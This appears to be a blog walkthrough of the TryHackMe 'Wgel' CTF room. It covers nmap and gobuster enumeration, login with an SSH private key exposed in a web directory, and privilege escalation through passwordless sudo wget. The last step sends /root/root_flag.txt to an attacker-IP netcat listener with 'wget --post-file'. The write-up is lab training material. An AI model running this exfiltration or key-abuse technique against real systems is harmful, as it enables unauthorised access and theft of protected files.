TryHackMe: Wgel write-up

In this article we’ll tackle an easy CTF on TryHackMe. We’ll enumerate a Linux box, find misplaced credentials and exploit a common Linux tool to escalate our privileges and exfiltrate information.

Link: https://tryhackme.com/room/wgelctf

Difficulty: Easy

Authors: MrSeth6797

First steps and enumeration

Our journey into this CTF challenge begins with a comprehensive nmap scan to identify active services on the target machine. The scan revealed two open ports: an HTTP server on port 80 and SSH on port 22, indicating potential targets for exploration. The HTTP server is running Apache httpd 2.4.18 on Ubuntu, while the SSH service is OpenSSH 7.2p2 Ubuntu 4ubuntu2.8.:

$ nmap -sV -sT -p- -oN nmap/full-scan.nmap $IP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 15:18 CET
Nmap scan report for 10.10.222.165
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds

It looks like the web server hosts the default web page bundled with Apache installation. However a quick GoBuster scan with the directory-list-lowercase-2.3-medium.txt list shows that there is something more than meets the eye:

$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt | tee gobuster.log

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.165
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/sitemap              (Status: 301) [Size: 316] [--> http://10.10.222.165/sitemap/]
Progress: 62904 / 207644 (30.29%)

There’s a hidden /sitemap directory. An inspection of the website’s source code also revealed a comment potentially hinting at a username:

<!-- Jessie don’t forget to udate the website. -->

The detail noted appears to be a potential username, which could be important later on. Next, we visited the /sitemap area of the website.

It’s a template from ColorLib, but nothing stood out at first. To dig deeper, I used GoBuster for a directory search. When the initial scan with one wordlist didn’t show results, I switched to the DirBuster wordlist for a more thorough search:

$ gobuster dir -u http://$IP/sitemap -w /usr/share/wordlists/dirb/common.txt | tee gobuster-sitemap.log 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.165/sitemap
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.ssh                 (Status: 301) [Size: 321] [--> http://10.10.222.165/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.10.222.165/sitemap/css/]
/fonts                (Status: 301) [Size: 322] [--> http://10.10.222.165/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.10.222.165/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 319] [--> http://10.10.222.165/sitemap/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

There is a very interesting hidden directory called .ssh. If we take a peek inside we find an SSH private key. We can make a handy backup copy of it on our machine and use it with the username jessie to access the target box. Inside Jessie’s Documents directory we can finally get the user flag.

Privilege escalation

After gaining access to the system, we proceeded to further enumerate its configuration. A quick check with sudo -l revealed a particularly interesting privilege assigned to the user jessie. The system allows jessie to execute wget as root without the need for a password:

$ sudo -l

Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

Since we can’t see what’s inside the /root directory, but guessing that the root flag might be called root_flag.txt (just like the user flag was named user_flag.txt), we can use wget to try and grab it.

First, let’s set up a listener on our local machine to receive the file. This can be done using netcat:

$ nc -vlnp 1337

Now let’s use wget to send the contents of the root_flag.txt file from the target system to our listener:

$ sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337

And just like that, we capture the root flag right in our terminal.

In the cyber world, coffee is the potion of champions. Support my efforts by offering me a virtual cup through 'Buy Me a Coffee'! Let's unravel the enigmas of CTF challenges and fortify our cyber arsenals together!

Leave a reply

Your email address will not be published. Required fields are marked *